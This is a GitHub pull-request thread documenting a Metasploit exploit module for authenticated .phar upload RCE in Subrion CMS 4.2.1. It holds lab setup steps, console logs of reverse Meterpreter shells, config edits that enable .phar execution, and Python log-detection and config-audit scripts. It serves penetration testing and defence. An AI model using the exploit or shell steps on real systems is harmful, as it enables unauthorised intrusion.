
Add module and documentation for Subrion CMS v4.2.1 RCE #18211

Merged


@ismaildawoodjee ismaildawoodjee commented Jul 21, 2023

Complex Software Examples:

  • Software with an extensive installation process - Subrion CMS v4.2.1 may require an extensive installation process when installing without the script below.

Setup

According to the official installation page, the setup for Subrion CMS v4.2.1 requires at least:

- Apache Server 1.3 or above (with `mod_rewrite`) installed
- PHP version 5 or above (with extensions GD lib, XML lib, FreeType installed)
- MySQL version 4.1 or above

LAMP is a recommended stack, so this module was tested on a Debian 10 VM along with the applications listed above. Installing Subrion can be somewhat tedious, and quite a few things can go wrong, so a quick and easy way would be to run the following script on a fresh image of Debian 10 with sudo user permissions. To be able to actually copy and paste the script, open-vm-tools and open-vm-tools-desktop need to be installed via apt if using VMware Workstation Player. Website links are also provided as reference to see what the commands are doing.

Subrion CMS v4.2.1 can be installed much more easily on XAMPP in Windows. However, I failed to achieve remote code execution when using XAMPP in Windows, neither with a basic webshell nor with the PhpEXE mixin payload.

Installation script on a fresh Debian 10 VM:

#!/bin/bash

# to be able to copy and paste, and add firewall tool
sudo apt update -y && sudo apt upgrade -y
sudo apt install -y vim ufw curl unzip open-vm-tools open-vm-tools-desktop
sudo systemctl restart ufw
sudo systemctl enable ufw

# install mysql v5.7
# https://computingforgeeks.com/how-to-install-mysql-on-debian-linux-system/?expand_article=1
wget -P ~/Downloads/ https://dev.mysql.com/get/mysql-apt-config_0.8.18-1_all.deb
sudo dpkg -i ~/Downloads/mysql-apt-config_0.8.18-1_all.deb
sudo apt update -y && sudo apt upgrade -y

# if the above gives an error, run:
sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 467B942D3A79BD29
sudo apt update -y && sudo apt upgrade -y

# NOTE: I installed MySQL 5.7 in my first two attempts on a fresh Debian 10, but can't install it again afterwards because of error:
# E: Unable to locate package mysql-community-server
# If this happens, use Docker to serve a MySQL container:
# sudo apt install -y default-mysql-server docker.io
# sudo docker run --name subriondb -e MYSQL_ROOT_PASSWORD=root -d mysql:5.7.42-debian
# sudo docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' subriondb
# mysql -h [SUBRIONDB_IP] -u root -proot
# mysql -h [SUBRIONDB_IP] -u root -proot -e 'CREATE DATABASE subrion; GRANT ALL PRIVILEGES ON subrion.* TO root@[SUBRIONDB_IP] IDENTIFIED BY "root" WITH GRANT OPTION; FLUSH PRIVILEGES;'

# choose mysql-5.7, set root password "root", and allow MySQL remote connections
sudo apt install -y mysql-community-server
sudo ufw allow mysql
sudo systemctl restart mysql
sudo systemctl enable mysql

# install php v7.3 and php extensions, and enable apache module
# https://computingforgeeks.com/install-php-on-debian-linux-systen/?expand_article=1
sudo apt update -y && sudo apt upgrade -y
sudo apt install -y php php-common
sudo apt install -y php-cli php-fpm php-json php-pdo php-mysql php-zip php-gd php-mbstring php-curl php-xml php-pear php-bcmath
sudo apt install -y libapache2-mod-php
# Debian 10 ships PHP 7.3; a2enmod takes a literal module name, not a shell glob
sudo a2enmod php7.3

# install apache2 v2.4.38
sudo apt update -y && sudo apt upgrade -y
sudo apt install -y apache2
sudo apt install -y libapache2-mod-php
sudo a2enmod rewrite
sudo systemctl restart apache2
sudo systemctl enable apache2

# create MySQL database for Subrion (with password "root")
mysql -u root -proot -e 'CREATE DATABASE subrion; GRANT ALL PRIVILEGES ON subrion.* TO root@localhost IDENTIFIED BY "root" WITH GRANT OPTION; FLUSH PRIVILEGES;'

# download and install Subrion 4.2.1
# https://www.vultr.com/docs/install-subrion-cms-with-lamp-stack-on-ubuntu-20-04/
# https://github.com/intelliants/subrion/wiki/Installation
sudo mkdir -p /var/www/subrion
sudo wget -P /var/www/subrion/ https://tools.subrion.org/get/latest.zip
sudo unzip /var/www/subrion/latest.zip -d /var/www/subrion/
sudo rm -rf /var/www/subrion/latest.zip
sudo chown -R www-data:www-data /var/www/subrion

# create virtual host for serving vulnerable Subrion website
# a2dissite/a2ensite take the site name from sites-available, not a full path
sudo a2dissite 000-default.conf
sudo touch /etc/apache2/sites-available/subrion.conf
# the heredoc delimiter is quoted so ${APACHE_LOG_DIR} is written literally and expanded by Apache, not by this shell
sudo bash -c 'cat << "EOF" > /etc/apache2/sites-available/subrion.conf
<VirtualHost *:80>
    ServerName subrion-vuln.com
    DocumentRoot "/var/www/subrion"
    <Directory "/var/www/subrion">
        Require all granted
        Options -Indexes +FollowSymLinks
        AllowOverride All
        Order allow,deny
        Allow from all
    </Directory>
    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
EOF'
sudo a2ensite subrion.conf
sudo systemctl restart apache2
echo '127.0.0.1 subrion-vuln.com' | sudo tee -a /etc/hosts

# navigate to subrion-vuln.com
python3 -m webbrowser 'http://subrion-vuln.com'
exit

This will set up Subrion CMS 4.2.1 as a virtual host website on http://subrion-vuln.com using the LAMP stack:

- Debian 10
- Apache Server v2.4.38
- MySQL v5.7.42
- PHP v7.3.31

LAMP on Debian 10:

ismail@debian:/usr/bin$ cat /etc/os-release 
PRETTY_NAME="Debian GNU/Linux 10 (buster)"
NAME="Debian GNU/Linux"
VERSION_ID="10"
VERSION="10 (buster)"
VERSION_CODENAME=buster
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"

ismail@debian:/usr/bin$ /usr/sbin/apache2 -v
Server version: Apache/2.4.38 (Debian)
Server built:   2023-04-21T22:01:00

ismail@debian:/usr/bin$ mysql --version
mysql  Ver 14.14 Distrib 5.7.42, for Linux (x86_64) using  EditLine wrapper

ismail@debian:/usr/bin$ php -v
PHP 7.3.31-1~deb10u4 (cli) (built: Jun 19 2023 19:10:11) ( NTS )
Copyright (c) 1997-2018 The PHP Group
Zend Engine v3.3.31, Copyright (c) 1998-2018 Zend Technologies
    with Zend OPcache v7.3.31-1~deb10u4, Copyright (c) 1999-2018, by Zend Technologies

Once this is done, and after the web browser opens up the Subrion CMS installation page at http://subrion-vuln.com/install, fill in the following fields in the Configuration page after passing the Pre-Installation Check and accepting the Subrion License:

DB Hostname:  localhost (default)

# if using a MySQL Docker container, put in the IP address found from the output of the following command:
# sudo docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' subriondb

DB Username:  root
DB Password:  root
DB Name:      subrion
DB Port:      3306 (default)
Table Prefix: sbr421_ (default)

Administrator Configuration:

Username:  admin
Password:  admin
Confirm:   admin
Email:     anyemail@mail.com

Once the configuration is done, navigate to http://subrion-vuln.com/panel/ and login as an Administrator to confirm successful setup.

Verification Steps

  1. Install and set up Subrion CMS v4.2.1 as described above.
  2. Verify that the admin panel login page can be accessed at http://subrion-vuln.com/panel/.
  3. Start msfconsole and follow along with default options
  4. Do: use exploit/linux/http/subrion_cms_file_upload_rce
  5. Do: set RHOSTS [SUBRION_SERVER_IP]
  6. Do: set LHOST eth0
  7. Do: exploit

Options

RPORT (Required)

This is the default HTTP port 80 for the Subrion CMS website.

TARGETURI (Required)

This is the base path of the Subrion CMS website. It can be changed in case the files are not installed as a VHost, for example, in /var/www/html/subrion/* and not in /var/www/subrion/*.

USERNAME (Required)

This is the username for the Subrion CMS admin panel page, required for exploitation.

PASSWORD (Required)

This is the password for the Subrion CMS admin panel page, also required for exploitation.

Scenarios

Subrion CMS v4.2.1 on Debian 10

  • Using PHP payload - default TARGET 0
msf6 > use exploit/linux/http/subrion_cms_file_upload_rce
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(linux/http/subrion_cms_file_upload_rce) > set RHOSTS 192.168.245.133
RHOSTS => 192.168.245.133
msf6 exploit(linux/http/subrion_cms_file_upload_rce) > set LHOST eth0
LHOST => 192.168.245.128
msf6 exploit(linux/http/subrion_cms_file_upload_rce) > exploit

[*] Started reverse TCP handler on 192.168.245.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking target web server for a response at: http://192.168.245.133:80/panel/
[+] Target is running Subrion CMS.
[*] Checking Subrion CMS version...
[+] Target is running Subrion CMS Version 4.2.1.
[!] This version check does not guarantee that the target is vulnerable, since a fix for the vulnerability can easily be applied by a web admin.
[+] The target appears to be vulnerable.
[*] Connecting to Subrion Admin Panel login page to obtain CSRF token...
[+] Successfully obtained CSRF token: mKMUcUoMJjRxTxOog8DXxeFxLGQVU7rHSX6slM85
[*] Logging in to Subrion Admin Panel at: http://192.168.245.133/panel/ using credentials admin:admin
[+] Successfully logged in as Administrator.
[*] Preparing payload...
[*] Sending POST data...
[+] Successfully uploaded payload at: http://192.168.245.133/uploads/htwgmjllep.phar
[*] Executing 'htwgmjllep.phar'... This file will be deleted after execution.
[*] Sending stage (39927 bytes) to 192.168.245.133
[*] Meterpreter session 1 opened (192.168.245.128:4444 -> 192.168.245.133:53698) at 2023-07-21 14:21:17 -0400
[+] Successfully executed payload: http://192.168.245.133/uploads/htwgmjllep.phar

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : debian
OS          : Linux debian 4.19.0-24-amd64 #1 SMP Debian 4.19.282-1 (2023-04-29) x86_64
Meterpreter : php/linux
meterpreter > 


Subrion CMS v4.2.1 on Ubuntu 20.04 (Exfiltrated from Proving Grounds Practice)

  • Also using PHP payload - default TARGET 0
msf6 > use exploit/linux/http/subrion_cms_file_upload_rce
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(linux/http/subrion_cms_file_upload_rce) > set RHOSTS 192.168.195.163
RHOSTS => 192.168.195.163
msf6 exploit(linux/http/subrion_cms_file_upload_rce) > set LHOST tun0
LHOST => tun0
msf6 exploit(linux/http/subrion_cms_file_upload_rce) > set LPORT 80
LPORT => 80
msf6 exploit(linux/http/subrion_cms_file_upload_rce) > exploit

[*] Started reverse TCP handler on 192.168.45.162:80 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking target web server for a response at: http://192.168.195.163:80/panel/
[+] Target is running Subrion CMS.
[*] Checking Subrion CMS version...
[+] Target is running Subrion CMS Version 4.2.1.
[!] This version check does not guarantee that the target is vulnerable, since a fix for the vulnerability can easily be applied by a web admin.
[+] The target appears to be vulnerable.
[*] Connecting to Subrion Admin Panel login page to obtain CSRF token...
[+] Successfully obtained CSRF token: rtPDWFrHa45hIhhXhLknM7DbWiHqAfux1fziFd3j
[*] Logging in to Subrion Admin Panel at: http://192.168.195.163/panel/ using credentials admin:admin
[+] Successfully logged in as Administrator.
[*] Preparing payload...
[*] Sending POST data...
[+] Successfully uploaded payload at: http://192.168.195.163/uploads/ixqywjyjyd.phar
[*] Executing 'ixqywjyjyd.phar'... This file will be deleted after execution.
[*] Sending stage (39927 bytes) to 192.168.195.163
[*] Meterpreter session 1 opened (192.168.45.162:80 -> 192.168.195.163:57658) at 2023-07-24 10:35:58 -0400
[+] Successfully executed payload: http://192.168.195.163/uploads/ixqywjyjyd.phar

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : exfiltrated
OS          : Linux exfiltrated 5.4.0-74-generic #83-Ubuntu SMP Sat May 8 02:35:39 UTC 2021 x86_64
Meterpreter : php/linux
meterpreter > shell
Process 2489 created.
Channel 0 created.
cat /etc/os-release               
NAME="Ubuntu"
VERSION="20.04.2 LTS (Focal Fossa)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 20.04.2 LTS"
VERSION_ID="20.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=focal
UBUNTU_CODENAME=focal

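The module runs above all follow the same visible sequence in the target's web logs: a POST login to /panel/, then a single request for a random-named .phar under /uploads/ (which then deletes itself). As an added detection example, not part of this PR or the Metasploit module, the following Python script scans Apache combined-format access log lines (the format the CustomLog line in the vhost above writes) for executable-type files requested from the uploads directory, and raises the severity when the same client POSTed to the admin panel shortly before. The log lines are constructed samples, not captured traffic.

```python
import re
from datetime import datetime, timedelta

# Apache "combined" LogFormat, as written by the CustomLog line in the vhost above.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Extensions a PHP handler may be configured to execute (the FilesMatch patterns
# discussed in this PR route .php and .phar to PHP).
EXEC_EXT_RE = re.compile(r"\.(?:php|phar|phtml)$", re.IGNORECASE)
# /uploads/ either at the web root or one directory down (a TARGETURI such as /subrion/)
UPLOAD_DIR_RE = re.compile(r"^/(?:[^/]+/)?uploads/", re.IGNORECASE)
PANEL_RE = re.compile(r"^/(?:[^/]+/)?panel/", re.IGNORECASE)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    rec["path"] = rec["path"].split("?", 1)[0]  # drop the query string
    return rec


def detect_upload_execution(lines, window=timedelta(minutes=5)):
    """Alert on executable-type files requested from the uploads directory.

    Severity is "high" when the same client POSTed to the admin panel within
    `window` beforehand (login/upload followed by execution), else "medium".
    A 404 is still reported: the module output above shows the file deleting
    itself after one request, so a later probe will not find it.
    """
    records = [r for r in map(parse_line, lines) if r]
    alerts = []
    for i, rec in enumerate(records):
        if not (UPLOAD_DIR_RE.search(rec["path"]) and EXEC_EXT_RE.search(rec["path"])):
            continue
        panel_post = any(
            p["ip"] == rec["ip"]
            and p["method"] == "POST"
            and PANEL_RE.search(p["path"])
            and rec["ts"] - window <= p["ts"] <= rec["ts"]
            for p in records[:i]
        )
        alerts.append({
            "ip": rec["ip"],
            "path": rec["path"],
            "status": rec["status"],
            "severity": "high" if panel_post else "medium",
        })
    return alerts


# Constructed sample lines (not real traffic), modelled on the module runs above.
SAMPLE_LOG = [
    '192.168.245.128 - - [21/Jul/2023:14:21:15 -0400] "GET /panel/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.168.245.128 - - [21/Jul/2023:14:21:15 -0400] "POST /panel/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '192.168.245.128 - - [21/Jul/2023:14:21:17 -0400] "GET /uploads/htwgmjllep.phar HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [21/Jul/2023:14:25:00 -0400] "GET /uploads/photo.jpg HTTP/1.1" 200 34211 "-" "Mozilla/5.0"',
    '192.168.100.1 - - [27/Jul/2023:18:20:45 +0200] "GET /subrion/uploads/ftxweolrol.phar?x=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [21/Jul/2023:15:02:41 -0400] "GET /uploads/test.php HTTP/1.1" 404 210 "-" "curl/7.74.0"',
]

if __name__ == "__main__":
    for alert in detect_upload_execution(SAMPLE_LOG):
        print(alert)
```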

@cdelafuente-r7 cdelafuente-r7 self-assigned this Jul 24, 2023
@cdelafuente-r7 cdelafuente-r7 left a comment

Thanks for this module @ismaildawoodjee ! This looks great. I just left a few comments and suggestions for you to review when you get a chance. I'll start testing once it is done.


LAMP is a recommended stack, so this module was tested on a Debian 10 VM along with the applications listed above. Installing Subrion can be somewhat tedious, and quite a few things can go wrong, so a quick and easy way would be to run the following script on a fresh image of Debian 10 with `sudo` user permissions. To be able to actually copy and paste the script, `open-vm-tools` and `open-vm-tools-desktop` need to be installed via `apt` if using VMware Workstation Player. Website links are also provided as reference to see what the commands are doing.

Subrion CMS v4.2.1 can be installed much more easily on XAMPP in Windows. However, I failed to achieve remote code execution in this configuration, neither with a basic webshell nor with the `PhpEXE` mixin payload.
Contributor

Did you get any error? Or maybe anything interesting in the server logs? We can help to debug this and make it work on Windows too.

Contributor Author

I downloaded and installed XAMPP 7.4.3 from here, and installed PHP 7.4.3 on Windows 10 and added to PATH. Expanded the Subrion 4.2.1 zip file in C:\xampp\htdocs\ and set it up easily.


After that I got quite a few warnings and deprecation notices, probably because it was PHP 7.4 and curly brace syntax was deprecated, but it probably wouldn't affect PHP file execution.


My initial hunch was that the PHP extension to execute .phar files was not installed on the Windows 10 host but according to https://stackoverflow.com/questions/66868454/install-it-or-recompile-php-without-disable-phar-on-windows, phar extensions are enabled by default and I also found phar when running php -m.

PS C:\WINDOWS\system32> php -v
PHP 7.4.3 (cli) (built: Feb 18 2020 17:29:46) ( ZTS Visual C++ 2017 x64 )
Copyright (c) The PHP Group
Zend Engine v3.4.0, Copyright (c) Zend Technologies
PS C:\WINDOWS\system32> php -m
[PHP Modules]
bcmath
bz2
calendar
Core
ctype
curl
date
dom
exif
fileinfo
filter
ftp
gd
gettext
hash
iconv
json
libxml
mbstring
mysqli
mysqlnd
openssl
pcre
PDO
pdo_mysql
pdo_sqlite
Phar    <<------<
readline
Reflection
session
SimpleXML
SPL
standard
tokenizer
xml
xmlreader
xmlwriter
zip
zlib

[Zend Modules]

Also disabled the phar.readonly and phar.require_hash settings in the php.ini file. Restarted Apache and retested, but no luck:


I get this error when looking at the source code of the web page:


The Apache error.log is ok, but to get the php_error_log, you need to create a folder: https://stackoverflow.com/questions/43247952/php-error-log-missing-in-xampp

But there's nothing of note in the Apache access.log or error.log or php_error_log.txt.


print_status('Checking Subrion CMS version...')
version = res.body.match('Powered by <a href=.*')
version_number = version.to_s.split.last.scan(/\d+/).join('.') if version
Contributor

Is there a more straightforward way to parse out the version here?

Contributor Author

I could parse it in a way similar to how I obtained the CSRF token.

Contributor Author

Implemented changes on Lines 95-97

@cdelafuente-r7 cdelafuente-r7 left a comment

Thanks for updating this @ismaildawoodjee. I just left a few more comments. I successfully tested using a Docker image and a Windows installation (see my comments below).

achieve remote code execution. In this module, a `.phar` file with a randomized name is uploaded and executed to receive a
Meterpreter session on the target, then deletes itself afterwards.

### Setup
Contributor

I managed to run version 4.1.0 using docker. I used a modified docker-compose.yml from the official repository:

version: '3'

services:
  subrion:
    image: intelliants/subrion
    container_name: subrion
    links:
      - subriondb:mysql
    ports:
      - 8080:80
    environment:
      SUBRION_DB_PASSWORD: secretpass

  subriondb:
    image: mysql:5.6
    container_name: subriondb
    environment:
      MYSQL_ROOT_PASSWORD: secretpass

Then run docker-compose up.

The config embedded in this docker image does not include the .phar file type to be parsed through the PHP handler. I needed to update the `/etc/apache2/conf-enabled/docker-php.conf` configuration file in the container and reload Apache:

❯  docker exec -ti subrion bash
root@f9e6aa4a9e5b:/var/www/html# sed -i'' 's/<FilesMatch .*/<FilesMatch \\.(php|phar)$>/' /etc/apache2/conf-enabled/docker-php.conf
root@f9e6aa4a9e5b:/var/www/html# /etc/init.d/apache2 reload
[ ok ] Reloading web server: apache2.

Then just finish the installation at http://127.0.0.1:8080/ with the following values:

DB Hostname:  subriondb
DB Username:  root
DB Password:  secretpass
DB Name:      subrion
DB Port:      3306 (default)
Table Prefix: sbr421_ (default)

Administrator Configuration:

Username:  admin
Password:  123456
Confirm:   123456
Email:     anyemail@mail.com

Please, would you mind adding this installation alternative to the documentation?

Contributor Author

Thanks for the additional testing. I'll try it out myself soon and add the results to the documentation.

Comment on lines 30 to 31
Subrion CMS v4.2.1 can be installed much more easily on XAMPP in Windows. However, I failed to achieve remote code
execution in this configuration, neither with a basic webshell nor with the `PhpEXE` mixin payload.
Contributor

I managed to make it work on Windows. Same as the Docker builds, the XAMPP Apache configuration does not include the .phar file type to be parsed through the PHP handler. This is what I've done:

  1. Install XAMPP 7.4.3
  2. Modify C:\xampp\apache\conf\extra\httpd-xampp.conf
     Change this line:

<FilesMatch "\.php$">

     to this:

<FilesMatch "\.(php|phar)$">

  3. Restart Apache

This is the Metasploit console output:

msf6 exploit(linux/http/subrion_cms_file_upload_rce) > run rhosts=192.168.100.103 lhost=192.168.100.1 username=admin password=123456 verbose=true targeturi=subrion/

[*] Started reverse TCP handler on 192.168.100.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking target web server for a response at: http://192.168.100.103/panel/
[+] Target is running Subrion CMS.
[*] Checking Subrion CMS version...
[+] Target is running Subrion CMS Version 4.2.1.
[+] The target appears to be vulnerable. However, this version check does not guarantee that the target is vulnerable, since a fix for the vulnerability can easily be applied by a web admin.
[*] Connecting to Subrion Admin Panel login page to obtain CSRF token...
[+] Successfully obtained CSRF token: JV9hc6PcMf0fO9VF9uqEMkiWQvNBiredsOQuqYtb
[*] Logging in to Subrion Admin Panel at: http://192.168.100.103/panel/ using credentials admin:123456
[+] Successfully logged in as Administrator.
[*] Preparing payload...
[*] Sending POST data...
[+] Successfully uploaded payload at: http://192.168.100.103/subrion/uploads/ftxweolrol.phar
[*] Executing 'ftxweolrol.phar'... This file will be deleted after execution.
[*] Sending stage (39927 bytes) to 192.168.100.103
[*] Meterpreter session 2 opened (192.168.100.1:4444 -> 192.168.100.103:50048) at 2023-07-27 18:20:46 +0200
[+] Successfully executed payload: http://192.168.100.103/subrion/uploads/ftxweolrol.phar

meterpreter > getuid
Server username: Administrator
meterpreter > sysinfo
Computer    : WIN2019
OS          : Windows NT WIN2019 10.0 build 17763 (Windows Server 2016) AMD64
Meterpreter : php/windows

Please, can you update the documentation with these Windows installation steps?
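Both fixes in this thread (the sed over docker-php.conf in the Docker comment and the httpd-xampp.conf edit just above) work by widening the FilesMatch pattern so the PHP handler also runs .phar files, which is exactly what an administrator hardening an upload directory wants to verify is not the case. As an added audit example, not from this PR or from Metasploit, the following Python script reads Apache configuration text, extracts each FilesMatch block that assigns a handler, and reports whether its pattern would route a .phar upload (or an unanchored double-extension name) to PHP. The config fragments are constructed from the two patterns quoted in this thread; the SetHandler line inside them is an assumption about the surrounding block.

```python
import re

# <FilesMatch "pattern"> ... </FilesMatch>; the pattern may be quoted (httpd-xampp.conf)
# or bare (the sed-rewritten docker-php.conf above).
FILESMATCH_RE = re.compile(
    r'<FilesMatch\s+"?(?P<pattern>[^">\s]+)"?\s*>(?P<body>.*?)</FilesMatch>',
    re.IGNORECASE | re.DOTALL,
)
# Directives that attach a handler/type, i.e. make the block affect execution.
HANDLER_RE = re.compile(r"^\s*(?:SetHandler|AddHandler|AddType)\b", re.IGNORECASE | re.MULTILINE)

# File names to test each pattern against. "image.php.jpg" catches an unanchored
# pattern (missing "$") that would also execute double-extension uploads.
PROBE_NAMES = ["index.php", "upload.phar", "page.phtml", "image.php.jpg", "photo.jpg"]


def audit_filesmatch(config_text):
    """Return one finding per FilesMatch block that assigns a handler.

    Each finding lists which PROBE_NAMES the block's pattern matches and whether
    a .phar upload would be executed. Apache uses PCRE; the simple patterns seen
    in PHP handler blocks evaluate identically with Python's re.
    """
    findings = []
    for m in FILESMATCH_RE.finditer(config_text):
        pattern, body = m.group("pattern"), m.group("body")
        if not HANDLER_RE.search(body):
            continue  # access-control-only block, not an execution handler
        try:
            rx = re.compile(pattern)
        except re.error as exc:
            findings.append({"pattern": pattern, "error": str(exc), "matches": [],
                             "executes_phar": None, "unanchored": None})
            continue
        matched = [name for name in PROBE_NAMES if rx.search(name)]
        findings.append({
            "pattern": pattern,
            "matches": matched,
            "executes_phar": "upload.phar" in matched,
            "unanchored": "image.php.jpg" in matched,
        })
    return findings


# Constructed config fragments built from the two patterns quoted in this thread
# (the SetHandler body is assumed; check your own file for the real directive).
XAMPP_DEFAULT = r'''
<FilesMatch "\.php$">
    SetHandler application/x-httpd-php
</FilesMatch>
'''
XAMPP_MODIFIED = r'''
<FilesMatch "\.(php|phar)$">
    SetHandler application/x-httpd-php
</FilesMatch>
'''
DOCKER_MODIFIED = r'''
<FilesMatch \.(php|phar)$>
    SetHandler application/x-httpd-php
</FilesMatch>
'''

if __name__ == "__main__":
    samples = [("xampp default", XAMPP_DEFAULT), ("xampp modified", XAMPP_MODIFIED),
               ("docker modified", DOCKER_MODIFIED)]
    for label, text in samples:
        for finding in audit_filesmatch(text):
            print(label, finding)
```

Run it against the real file (for example `audit_filesmatch(open(path).read())`) to confirm that only the extensions you intend are handled and that every pattern is anchored with `$`.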

Contributor Author

That's great to know. So it was an XAMPP-specific problem/configuration? I also tried an alternative installation using WAMP.NET and failed to get RCE. I'll look at it soon and add to the docs, a bit occupied at the moment.

Contributor Author

Added the installation instructions for both Docker and XAMPP. If you don't mind, may I know how you found out about the configuration file not allowing execution of .phar files? I searched and searched but could not find the solution 😕

Contributor

Thank you for updating the documentation. I accessed the .phar file directly with a browser after it had been uploaded by the module and noticed the php code was not interpreted by the server. I've seen this before and immediately thought about a configuration issue. I had to look into all the configuration files to locate the correct FilesMatch and modify it.

@cdelafuente-r7

Thanks for updating this. Since it is a generic PHP target and it is compatible with both Linux and Windows, would you mind moving the module under modules/exploits/multi/http/ and the documentation under documentation/modules/exploit/multi/http/?


ismaildawoodjee commented Aug 1, 2023

Thanks for updating this. Since it is a generic PHP target and it is compatible with both Linux and Windows, would you mind moving the module under modules/exploits/multi/http/ and the documentation under documentation/modules/exploit/multi/http/?

Sure, I'll do that. However, I noticed an issue with the php/windows Meterpreter session that opens on Windows targets. Meterpreter commands can be run, but after I spawn a shell with shell, CMD commands such as whoami or dir do not get run and they eventually time out in the shell.

The following exploits were against a XAMPP configuration on Windows 10, set up according to the instructions in the README. The Meterpreter session opens, but shell commands cannot be run:

msf6 exploit(linux/http/subrion_cms_file_upload_rce) > exploit

[*] Started reverse TCP handler on 192.168.245.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking target web server for a response at: http://192.168.29.1/panel/
[+] Target is running Subrion CMS.
[*] Checking Subrion CMS version...
[+] Target is running Subrion CMS Version 4.2.1.
[+] The target appears to be vulnerable. However, this version check does not guarantee that the target is vulnerable, since a fix for the vulnerability can easily be applied by a web admin.
[*] Connecting to Subrion Admin Panel login page to obtain CSRF token...
[+] Successfully obtained CSRF token: 4ZYPtRV9oZEboIGk2LPXJEorkgwUnW3NoaNxw8HE
[*] Logging in to Subrion Admin Panel at: http://192.168.29.1/panel/ using credentials admin:123456
[+] Successfully logged in as Administrator.
[*] Preparing payload...
[*] Sending POST data...
[+] Successfully uploaded payload at: http://192.168.29.1/uploads/hnhzicvsca.phar
[*] Executing 'hnhzicvsca.phar'... This file will be deleted after execution.
[*] Sending stage (39927 bytes) to 192.168.245.1
[*] Meterpreter session 1 opened (192.168.245.128:4444 -> 192.168.245.1:63453) at 2023-08-01 07:29:20 -0400
[+] Successfully executed payload: http://192.168.29.1/uploads/hnhzicvsca.phar

meterpreter > getuid
Server username: SYSTEM
meterpreter > sysinfo
Computer    : DESKTOP-50BU5J8
OS          : Windows NT DESKTOP-50BU5J8 10.0 build 19045 (Windows 10) AMD64
Meterpreter : php/windows
meterpreter > shell
Process 14308 created.
Channel 0 created.
Microsoft Windows [Version 10.0.19045.3208]
(c) Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\uploads>whoami    <<---------<< Here, the shell becomes unresponsive and the following prompt appears

Terminate channel 0? [y/N]  y
[-] Error running command shell: Rex::TimeoutError Send timed out
meterpreter > shell
[-] Error running command shell: Rex::TimeoutError Send timed out
meterpreter > 
[*] 192.168.29.1 - Meterpreter session 1 closed.  Reason: Died

The Meterpreter session dies after I try to get another shell:

msf6 exploit(linux/http/subrion_cms_file_upload_rce) > exploit

[*] Started reverse TCP handler on 192.168.245.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking target web server for a response at: http://192.168.29.1/panel/
[+] Target is running Subrion CMS.
[*] Checking Subrion CMS version...
[+] Target is running Subrion CMS Version 4.2.1.
[+] The target appears to be vulnerable. However, this version check does not guarantee that the target is vulnerable, since a fix for the vulnerability can easily be applied by a web admin.
[*] Connecting to Subrion Admin Panel login page to obtain CSRF token...
[+] Successfully obtained CSRF token: 2252t69N1EcpnkeSx8J6qVcMtYfbgiskdBgOSRYE
[*] Logging in to Subrion Admin Panel at: http://192.168.29.1/panel/ using credentials admin:123456
[+] Successfully logged in as Administrator.
[*] Preparing payload...
[*] Sending POST data...
[+] Successfully uploaded payload at: http://192.168.29.1/uploads/ymsmovwlju.phar
[*] Executing 'ymsmovwlju.phar'... This file will be deleted after execution.
[*] Sending stage (39927 bytes) to 192.168.245.1
[*] Meterpreter session 3 opened (192.168.245.128:4444 -> 192.168.245.1:63495) at 2023-08-01 07:35:15 -0400
[+] Successfully executed payload: http://192.168.29.1/uploads/ymsmovwlju.phar

meterpreter > getuid
Server username: SYSTEM
meterpreter > sysinfo
Computer    : DESKTOP-50BU5J8
OS          : Windows NT DESKTOP-50BU5J8 10.0 build 19045 (Windows 10) AMD64
Meterpreter : php/windows
meterpreter > shell
Process 1508 created.
Channel 0 created.
Microsoft Windows [Version 10.0.19045.3208]
(c) Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\uploads>dir

Terminate channel 0? [y/N]  N

Terminate channel 0? [y/N]  N

Terminate channel 0? [y/N]  y
[-] Error running command shell: Rex::TimeoutError Send timed out
meterpreter > shell

[*] 192.168.29.1 - Meterpreter session 3 closed.  Reason: Died
[-] Error running command shell: Rex::TimeoutError Send timed out
msf6 exploit(linux/http/subrion_cms_file_upload_rce) > 

Could you confirm that this also happens on your end? Perhaps I can raise an issue if it's not specific to my machine.

@cdelafuente-r7

Thanks for reporting this. I confirmed the issue is not related to your module. I tried with both PHP version 7.4.3 and 8.9.0 and got the same issue.

On Metasploit console:

msf6 payload(php/meterpreter/reverse_tcp) > set lhost 192.168.100.1
lhost => 192.168.100.1
msf6 payload(php/meterpreter/reverse_tcp) > generate -f raw
